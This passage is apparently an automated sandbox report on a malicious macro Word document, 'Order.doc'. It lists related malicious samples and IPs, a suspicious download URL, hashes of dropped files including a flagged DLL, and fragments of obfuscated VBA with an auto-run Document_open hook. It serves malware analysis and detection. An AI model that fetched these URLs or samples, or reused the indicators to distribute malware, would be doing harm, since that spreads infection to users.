                                            363evUVPRxr3.exeGet hashmaliciousBrowse
                                            • 186.19.196.93
                                            4Cc4YU01dF.sctGet hashmaliciousBrowse
                                            • 186.23.49.11
                                            http://206.189.68.184/xybt_A1sb-SMlX/qFX/Attachments/02_19Get hashmaliciousBrowse
                                            • 190.55.118.192
                                            20tex.exeGet hashmaliciousBrowse
                                            • 186.19.212.93
                                            01_2019_DTK206094-45.docGet hashmaliciousBrowse
                                            • 200.125.113.60
                                            GOOGLEUSFileZilla_3.52.2_win64_sponsored-setup.exeGet hashmaliciousBrowse
                                            • 216.58.207.142
                                            N00048481397007.docGet hashmaliciousBrowse
                                            • 172.217.6.174
                                            DHL.6.apkGet hashmaliciousBrowse
                                            • 172.217.20.238
                                            Tebling_Resortsac_FILE-HP38XM.htmGet hashmaliciousBrowse
                                            • 172.217.22.225
                                            DHL.6.apkGet hashmaliciousBrowse
                                            • 172.217.20.238
                                            k.dllGet hashmaliciousBrowse
                                            • 35.247.145.179
                                            DHL.apkGet hashmaliciousBrowse
                                            • 216.58.207.138
                                            560911_P.EXEGet hashmaliciousBrowse
                                            • 34.102.136.180
                                            RevisedPO.24488_pdf.exeGet hashmaliciousBrowse
                                            • 34.102.136.180
                                            67654565677.htmLGet hashmaliciousBrowse
                                            • 172.217.22.225
                                            documents_0084568546754.exeGet hashmaliciousBrowse
                                            • 34.102.136.180
                                            SAMSUNG C&T UPCOMING PROJECTS19-027-MP-010203.exe.exeGet hashmaliciousBrowse
                                            • 34.102.136.180
                                            pl.cda_310.apkGet hashmaliciousBrowse
                                            • 172.217.23.14
                                            pl.cda_310.apkGet hashmaliciousBrowse
                                            • 172.217.22.238
                                            Acunetix Premium v13.0.201112128 Activation Tool.exeGet hashmaliciousBrowse
                                            • 172.217.22.226
                                            F-Droid.apkGet hashmaliciousBrowse
                                            • 216.239.35.0
                                            F-Droid.apkGet hashmaliciousBrowse
                                            • 172.217.20.238
                                            org.thoughtcrime.securesms_77202.apkGet hashmaliciousBrowse
                                            • 216.58.207.138
                                            org.thoughtcrime.securesms_77202.apkGet hashmaliciousBrowse
                                            • 172.217.20.234
                                            fusion.exeGet hashmaliciousBrowse
                                            • 173.194.69.108
                                            CLOUDFLARENETUSSecuriteInfo.com.Heur.13954.xlsGet hashmaliciousBrowse
                                            • 104.21.22.6
                                            FileZilla_3.52.2_win64_sponsored-setup.exeGet hashmaliciousBrowse
                                            • 162.159.200.1
                                            PAYMENT INFO.xlsxGet hashmaliciousBrowse
                                            • 104.16.18.94
                                            PAYMENT INFO.xlsxGet hashmaliciousBrowse
                                            • 104.16.18.94
                                            qp38gXDG87.exeGet hashmaliciousBrowse
                                            • 172.67.142.109
                                            case_3499.xlsGet hashmaliciousBrowse
                                            • 172.67.130.49
                                            case.2991.xlsGet hashmaliciousBrowse
                                            • 172.67.130.49
                                            N00048481397007.docGet hashmaliciousBrowse
                                            • 104.21.88.166
                                            fod1jZt8yK.exeGet hashmaliciousBrowse
                                            • 104.23.98.190
                                            info5440.xlsGet hashmaliciousBrowse
                                            • 104.21.7.112
                                            notif-3615.xlsGet hashmaliciousBrowse
                                            • 104.21.84.93
                                            RFQ for the supply of materialsservices for P.O. No. - 4700001838.exeGet hashmaliciousBrowse
                                            • 104.23.99.190
                                            notif6158.xlsGet hashmaliciousBrowse
                                            • 104.21.84.93
                                            file.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            k.dllGet hashmaliciousBrowse
                                            • 104.21.88.84
                                            Quotation for T10495.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            FP4554867134UQ.docGet hashmaliciousBrowse
                                            • 172.67.215.216
                                            case (348).xlsGet hashmaliciousBrowse
                                            • 104.21.23.220
                                            case (348).xlsGet hashmaliciousBrowse
                                            • 172.67.213.245
                                            MENSAJE.docGet hashmaliciousBrowse
                                            • 172.67.156.114

                                            JA3 Fingerprints

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            05af1f5ca1b87cc9cc9b25185115607dSecuriteInfo.com.Heur.13954.xlsGet hashmaliciousBrowse
                                            • 104.21.88.166
                                            case_3499.xlsGet hashmaliciousBrowse
                                            • 104.21.88.166
                                            case.2991.xlsGet hashmaliciousBrowse
                                            • 104.21.88.166
                                            N00048481397007.docGet hashmaliciousBrowse
                                            • 104.21.88.166
                                            info5440.xlsGet hashmaliciousBrowse
                                            • 104.21.88.166
                                            notif-3615.xlsGet hashmaliciousBrowse
                                            • 104.21.88.166
                                            notif6158.xlsGet hashmaliciousBrowse
                                            • 104.21.88.166
                                            INC_Y5KPAYAWWU7.docGet hashmaliciousBrowse
                                            • 104.21.88.166
                                            mensaje_012021_1-538086.docGet hashmaliciousBrowse
                                            • 104.21.88.166
                                            eiW9G6sAIS.xlsmGet hashmaliciousBrowse
                                            • 104.21.88.166
                                            eiW9G6sAIS.xlsmGet hashmaliciousBrowse
                                            • 104.21.88.166
                                            2531 2212 2020 QG-826729.docGet hashmaliciousBrowse
                                            • 104.21.88.166
                                            USD_ Payment Schedule.xlsGet hashmaliciousBrowse
                                            • 104.21.88.166
                                            Arch 30 S_07215.docGet hashmaliciousBrowse
                                            • 104.21.88.166
                                            Info-237-602317.docGet hashmaliciousBrowse
                                            • 104.21.88.166
                                            Info-237-602317.docGet hashmaliciousBrowse
                                            • 104.21.88.166
                                            8776139.docmGet hashmaliciousBrowse
                                            • 104.21.88.166
                                            8776139.docmGet hashmaliciousBrowse
                                            • 104.21.88.166
                                            2021_20_01_31624.docGet hashmaliciousBrowse
                                            • 104.21.88.166
                                            433.docGet hashmaliciousBrowse
                                            • 104.21.88.166

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A07A78F5-D643-47FF-B622-0CF30ED55516}.tmp
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1024
                                            Entropy (8bit):0.05390218305374581
                                            Encrypted:false
                                            SSDEEP:3:ol3lYdn:4Wn
                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E3975822-A796-4096-8B6B-C6BCF64E2588}.tmp
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1536
                                            Entropy (8bit):1.3555252507007243
                                            Encrypted:false
                                            SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbs:IiiiiiiiiifdLloZQc8++lsJe1Mz5l
                                            MD5:8F83FE1F31DE39C1D9B5770AAADEBA0D
                                            SHA1:D632C1ACE854A9EFBA1697ECEDD6A0067FBC669F
                                            SHA-256:8A187529AE64BE7E8C62581F1F097ECF184DA59FD4855374C921B4900819305C
                                            SHA-512:40B6E44D05AEC530A7B05876EC8C9986CF7608633A366E53D9DC80A3F1C0343AB1FDFF3957F24A1214FC2CF925429A8E0B7BD7E1C57B46EDF441283406537136
                                            Malicious:false
                                            Reputation:low
                                            Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Order.LNK
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:11 2020, mtime=Wed Aug 26 14:08:11 2020, atime=Tue Jan 26 06:13:33 2021, length=142336, window=hide
                                            Category:dropped
                                            Size (bytes):1970
                                            Entropy (8bit):4.4965710105179895
                                            Encrypted:false
                                            SSDEEP:24:848n/XTr6N4U8yPSeqDv3qc4dM7dD248n/XTr6N4U8yPSeqDv3qc4dM7dV:844/XT+NnP6ifQh244/XT+NnP6ifQ/
                                            MD5:8836D1455A5B492BAEA935C695F6DB1E
                                            SHA1:69E780622524B28E7CBF1BE3CB9B65366D865CD2
                                            SHA-256:E620D0EBDD84A6F402D68CC06D32A32DE6F671344C930760A44C68DCE0895E39
                                            SHA-512:AFA21B3B2BAC7349F4BF237565527D01EDEBB3668E42EF01A4F12CABFC191E1DDC85F5D9F0F835AE31FCCD14AA38AD512646FB83C0BC3DEDCDA223C5D3F44341
                                            Malicious:false
                                            Reputation:low
                                            Preview: L..................F.... ...T\...{..T\...{...4.......,...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....X.2..,..:R.9 .Order.doc.@.......Q.y.Q.y*...8.....................O.r.d.e.r...d.o.c.......s...............-...8...[............?J......C:\Users\..#...................\\585948\Users.user\Desktop\Order.doc. .....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.O.r.d.e.r...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......585948..........D_....3N...W...9F.C...........[D_....3N...W...9F.C...........[....L..............
                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):53
                                            Entropy (8bit):3.9094714650359332
                                            Encrypted:false
                                            SSDEEP:3:M1sBYFFoyOFFomX1sBYFFov:MSBYjAj0BYjy
                                            MD5:DE7882B51ABEB0B80147A66F2A1CF8F5
                                            SHA1:296A148DF07BA72D9EB084647648A37312E2752A
                                            SHA-256:FD766F931C987F5357FC874686E351CFDF3FBF40322D815A20729A10B48FD32E
                                            SHA-512:88130EDB398212AB6FADDB566A3AD1F396367DE8A33D49CC3EC9DB4CC971BC24D96D83AA3316380E144A6E00DB5DB1B9FB7430F13C8368E53AD394C93D069943
                                            Malicious:false
                                            Preview: [doc]..Order.LNK=0..Order.LNK=0..[doc]..Order.LNK=0..
                                            C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):162
                                            Entropy (8bit):2.431160061181642
                                            Encrypted:false
                                            SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                            MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                            SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                            SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                            SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                            Malicious:false
                                            Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y1B2TNFFMYFTDZJ3L541.temp
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):8016
                                            Entropy (8bit):3.591236346963085
                                            Encrypted:false
                                            SSDEEP:96:chQCsMqZqvsqvJCwoBz8hQCsMqZqvsEHyqvJCwor/z1PYyHyf8ILlUVLIu:cywoBz8yMHnor/z1+f8IsIu
                                            MD5:DBB6F2ED4406C0905F6BE3DF522FF8AB
                                            SHA1:9502BDB76928232D12FD17D00F2B22DE60A94BFD
                                            SHA-256:D449741722E4DEA768A2F8896628AC5F2136791B4F61626FAFDBDFF43D4AC37A
                                            SHA-512:DF5F33A98F488701D1F1A341B44AF5C70AECD550D67BF489D73DE7D3442FCFE83239BFD73117A2466A43E71757E75ED996389FECD5340CB36EDF1DFA82DC1A89
                                            Malicious:false
                                            Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                            C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):624128
                                            Entropy (8bit):6.9039392338972965
                                            Encrypted:false
                                            SSDEEP:12288:4YzchQVZnkmt/70MWugxPJZFpf0c1pHgbdJxUR9rNXZL4:L4KV5Hpt8bZHL4nM919
                                            MD5:46F0A7BA7416C01A1A3D349024CFEB91
                                            SHA1:B2D3446F52EDED67773DD54F6A4B720D60F9A094
                                            SHA-256:0299170ABAED37E0A89FEF77CBBD1921E7891A5BCA94A9F1B650C5370DCF3400
                                            SHA-512:C4A45F8EF20CC0A74882A661AD365E9AFAF57F9B00B8B262A84B0BABF6709B96B0D177794544E58C7603DD5E2010CA76945506688D9090FABC168B37766B80D0
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 39%
                                            Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................0...R.......>.......@....@..........................................................................p..."...............................n..................................................................................CODE.............0.................. ..`DATA.........@.......4..............@...BSS..........`.......J...................idata..."...p...$...J..............@....reloc...n.......p...n..............@..P.rsrc...............................@..P....................................@..P........................................................................................................................................................................................................................
                                            C:\Users\user\Desktop\~$Order.doc
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):162
                                            Entropy (8bit):2.431160061181642
                                            Encrypted:false
                                            SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                            MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                            SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                            SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                            SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                            Malicious:true
                                            Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...

                                            Static File Info

                                            General

                                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Harum consequatur suscipit voluptatem explicabo placeat laborum. Est quidem sequi enim tenetur., Author: Margarita Lara, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Jan 25 09:18:00 2021, Last Saved Time/Date: Mon Jan 25 09:18:00 2021, Number of Pages: 1, Number of Words: 5366, Number of Characters: 30587, Security: 8
                                            Entropy (8bit):6.219456379922718
                                            TrID:
                                            • Microsoft Word document (32009/1) 79.99%
                                            • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                                            File name:Order.doc
                                            File size:141824
                                            MD5:1a0ae833990a558910254e9bebfaeeaf
                                            SHA1:c6f348043fb590f9638ed792a331695475b79af1
                                            SHA256:5648715fe9ed7418d2d2b101a4ae8f4bb814ac68e422f78641595b37a83eb84e
                                            SHA512:33423d2027fa0d3f75555c6ca45a9b20934bcfb2dfb6e799a4a564feabfdec5680f94a2d093ebf0659eaedbaaff66e329801b7691560f4c0e163215b53748a84
                                            SSDEEP:1536:ANpHZTgQSz4w4K0vOYOcc2bqrQF7W5nKBf1Gxi:k1gQSU3K0hzqrQFa58G
                                            File Content Preview:........................>......................................................................................................................................................................................................................................

                                            File Icon

                                            Icon Hash:e4eea2aaa4b4b4a4

                                            Static OLE Info

                                            General

                                            Document Type:OLE
                                            Number of OLE Files:1

                                            OLE File "Order.doc"

                                            Indicators

                                            Has Summary Info:True
                                            Application Name:Microsoft Office Word
                                            Encrypted Document:False
                                            Contains Word Document Stream:True
                                            Contains Workbook/Book Stream:False
                                            Contains PowerPoint Document Stream:False
                                            Contains Visio Document Stream:False
                                            Contains ObjectPool Stream:
                                            Flash Objects Count:
                                            Contains VBA Macros:True

                                            Summary

                                            Code Page:1252
                                            Title:Harum consequatur suscipit voluptatem explicabo placeat laborum. Est quidem sequi enim tenetur.
                                            Subject:
                                            Author:Margarita Lara
                                            Keywords:
                                            Comments:
                                            Template:
                                            Last Saved By:
                                            Revion Number:1
                                            Total Edit Time:0
                                            Create Time:2021-01-25 09:18:00
                                            Last Saved Time:2021-01-25 09:18:00
                                            Number of Pages:1
                                            Number of Words:5366
                                            Number of Characters:30587
                                            Creating Application:Microsoft Office Word
                                            Security:8

                                            Document Summary

                                            Document Code Page:-535
                                            Number of Lines:254
                                            Number of Paragraphs:71
                                            Thumbnail Scaling Desired:False
                                            Company:Gurule, Quintero cruz and Coln
                                            Contains Dirty Links:False
                                            Shared Document:False
                                            Changed Hyperlinks:False
                                            Application Version:917504

                                            Streams with VBA

                                            VBA File Name: Jlzk8qsqcshl6jk, Stream Size: 14594
                                            General
                                            Stream Path:Macros/VBA/Jlzk8qsqcshl6jk
                                            VBA File Name:Jlzk8qsqcshl6jk
                                            Stream Size:14594
                                            Data ASCII:. . . . . . . . . d . . . . . . . . . . . . . . . l . . . . , . . . . . . . . . . E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:01 16 01 00 00 f0 00 00 00 64 10 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 6c 10 00 00 1c 2c 00 00 00 00 00 00 01 00 00 00 45 ed dd ee 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                            VBA Code Keywords

                                            Keyword
                                            RzBkG
                                            Array((IcMvJH),
                                            woXMHFAWj:
                                            ndrons
                                            zaPgDlYE
                                            wefyBED
                                            EBzng
                                            TTSSDBE)
                                            ihJfBp
                                            Array((KTwdM),
                                            Const
                                            tfUFkPBI
                                            frXBRIAUC)
                                            ZDFvjGA
                                            BkXdJC
                                            Resume
                                            YoONRCDR
                                            Split(OhlNFI,
                                            VGJvOIo
                                            HKGPhf()
                                            Array((RCizEteb),
                                            Array((YoONRCDR),
                                            Array((tTYAKI),
                                            VGJvOIo:
                                            gHvzZ
                                            Ikdha
                                            AndgBCK()
                                            dGHeiB)
                                            IfwvovBbI:
                                            AndgBCK
                                            nXOBD
                                            LPhmsCuzH
                                            hpBCIH
                                            Array((RPnSaCJu),
                                            zWNhsCZ
                                            mxkikw
                                            "ndpns
                                            wPwsfD
                                            zrdcAzBue)
                                            pqwm,
                                            VCOQBBJME
                                            Array((cujVJONG),
                                            qabazEA
                                            SdmZKHA
                                            Array((jvKCCCN),
                                            xqRcJHJC
                                            bvWlGF
                                            Array((BjxaCGJ),
                                            BJuiHE()
                                            DfLwCIJs
                                            Array((szAVCX),
                                            YeFGHHg
                                            cujVJONG
                                            Array((QhLjEC),
                                            UdmGIddWE
                                            SwIwjFCGt
                                            vXKNhR()
                                            Array((nUCpSBGl),
                                            IAZNKNFF
                                            Range:
                                            NjfVZEH
                                            TtymyqHC
                                            "*high*,*critic*"
                                            RCizEteb
                                            SdmZKHA:
                                            RPnSaCJu
                                            kqPZDRGh
                                            xolsDFAoA
                                            UdmGIddWE)
                                            dxujxGCSH:
                                            kzJQDGJE
                                            eFJdCEIGJ
                                            TmaaI)
                                            GvzsBP
                                            aspdJ
                                            Split(eiWFHgJI,
                                            BJuiHE
                                            mjbBYHhbs
                                            mgbUQB:
                                            gFPNA()
                                            aRiqA
                                            VkIrTt
                                            YqzDYkkZ
                                            tFQrUF:
                                            UByHC
                                            FQbNABABD
                                            JoWtI
                                            String
                                            BcOIJEb
                                            LIhSwfESI
                                            ymBRCJA
                                            tFQrUF
                                            dDVvDFyJ
                                            Split(aspdJ,
                                            AEmiPt
                                            Nothing
                                            GwCvEyD
                                            Split(FwnlEcJ,
                                            mgbUQB
                                            HKGPhf
                                            dDVvDFyJ:
                                            PCZMFnb)
                                            Nbpclsvfxustc,
                                            nMrFDxBZ)
                                            qabazEA:
                                            Array((yoxbGFcFG),
                                            qckhE
                                            NRCfdB
                                            fcMsqBqHS
                                            WnGZXISGD
                                            Split(zWNhsCZ,
                                            mQJJC:
                                            UFSXB
                                            UFSXB)
                                            KTwdM
                                            Split(ymBRCJA,
                                            frXBRIAUC
                                            TWtrFHKBF
                                            nd:wns
                                            GpgYnI()
                                            Array((IzaGEVCD),
                                            CivKlI
                                            NPikOxWEE)
                                            tkDRHFKIL
                                            kOGmA)
                                            eFJdCEIGJ()
                                            JHxtqF
                                            NABiUJmBA
                                            PCZMFnb
                                            zrdcAzBue
                                            Split(gzqiCG,
                                            VkIrTt)
                                            dxujxGCSH
                                            gHvzZ)
                                            NRCfdB)
                                            UNxmoIDW()
                                            ndgmns
                                            BBKJHBtF
                                            EBzng)
                                            eBdxEG
                                            AEmiPt:
                                            Split(BkXdJC,
                                            QTrqHnpVB
                                            Split(QTrqHnpVB,
                                            ndinns
                                            kzJQDGJE()
                                            Array((FQbNABABD),
                                            Split(Ikdha,
                                            LIhSwfESI()
                                            nMrFDxBZ
                                            Mid(skuwd,
                                            Target)
                                            tTYAKI
                                            AsczD()
                                            gFPNA
                                            LIJNuGn
                                            xqRcJHJC()
                                            mpLEDLwAI)
                                            tkDRHFKIL()
                                            Split(kvSXRJ,
                                            mpLEDLwAI
                                            HJbpE:
                                            FwnlEcJ
                                            dGHeiB
                                            xhvKHu
                                            szAVCX
                                            URsHL()
                                            tllnMEB
                                            Split(wefyBED,
                                            Len(skuwd))
                                            RoGdiLo
                                            ZDFvjGA)
                                            xolsDFAoA)
                                            IAZNKNFF:
                                            kvSXRJ
                                            bhdApJCs
                                            BjxaCGJ
                                            Array((JoWtI),
                                            Split(liXWDHf,
                                            XCCUFUDF()
                                            woXMHFAWj
                                            Split(SwIwjFCGt,
                                            Array((ODzQPrd),
                                            Array((NABiUJmBA),
                                            ndmns
                                            Attribute
                                            OhlNFI
                                            uPBZMu
                                            JHxtqF()
                                            DOTbEvAC
                                            aRiqA:
                                            QhLjEC
                                            Split(RoGdiLo,
                                            URsHL
                                            Split(wrBNJ,
                                            ndsns
                                            nUCpSBGl
                                            OMnbClgE
                                            NjfVZEH:
                                            MemVBBC
                                            Array((TWtrFHKBF),
                                            WTESfHHbE
                                            jvKCCCN
                                            GwBkDZG
                                            TmaaI
                                            LIJNuGn:
                                            RzBkG)
                                            VB_Name
                                            Content
                                            uPBZMu:
                                            Split(DOTbEvAC,
                                            wxhyXoc
                                            Array((GvzsBP),
                                            Function
                                            ODzQPrd
                                            kYSmGCjDH
                                            lJxIKkhCA
                                            LPhmsCuzH()
                                            OMnbClgE:
                                            eiWFHgJI
                                            Error
                                            zaPgDlYE()
                                            MFOcG
                                            kOGmA
                                            ndtns
                                            Split(bvWlGF,
                                            YeFGHHg:
                                            UNxmoIDW
                                            IcMvJH
                                            nd_ns
                                            bhdApJCs)
                                            GpgYnI
                                            NPikOxWEE
                                            Array((nXOBD),
                                            yoxbGFcFG
                                            wGGXPWXvH
                                            BcOIJEb:
                                            IfwvovBbI
                                            qckhE:
                                            XCCUFUDF
                                            gzqiCG
                                            wrBNJ
                                            Split(WnGZXISGD,
                                            IzaGEVCD
                                            Split(DfLwCIJs,
                                            HJbpE
                                            Split(wGGXPWXvH,
                                            AsczD
                                            DWDXCYzB
                                            Mid(Application.Name,
                                            tllnMEB()
                                            mQJJC
                                            fcMsqBqHS)
                                            String:
                                            liXWDHf
                                            GwBkDZG()
                                            vXKNhR
                                            HiXlCAMl
                                            skuwd
                                            GwCvEyD()
                                            TTSSDBE
                                            VBA Code
                                            VBA File Name: Pc1nzntniqj_dur51, Stream Size: 704
                                            General
                                            Stream Path:Macros/VBA/Pc1nzntniqj_dur51
                                            VBA File Name:Pc1nzntniqj_dur51
                                            Stream Size:704
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . E . . ' . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 45 ed c9 27 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                            VBA Code Keywords

                                            Keyword
                                            Attribute
                                            VB_Name
                                            VBA Code
                                            VBA File Name: Ynzysnuyyfihfq23d, Stream Size: 1174
                                            General
                                            Stream Path:Macros/VBA/Ynzysnuyyfihfq23d
                                            VBA File Name:Ynzysnuyyfihfq23d
                                            Stream Size:1174
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E . . c . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:01 16 01 00 00 f0 00 00 00 04 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 0b 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 45 ed 83 63 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                            VBA Code Keywords

                                            Keyword
                                            False
                                            Private
                                            VB_Exposed
                                            Attribute
                                            VB_Name
                                            VB_Creatable
                                            Document_open()
                                            VB_PredeclaredId
                                            VB_GlobalNameSpace
                                            VB_Base
                                            VB_Customizable
                                            VB_TemplateDerived
                                            VBA Code

                                            Streams

                                            Stream Path: \x1CompObj, File Type: data, Stream Size: 146
                                            General
                                            Stream Path:\x1CompObj
                                            File Type:data
                                            Stream Size:146
                                            Entropy:4.00187355764
                                            Base64 Encoded:False
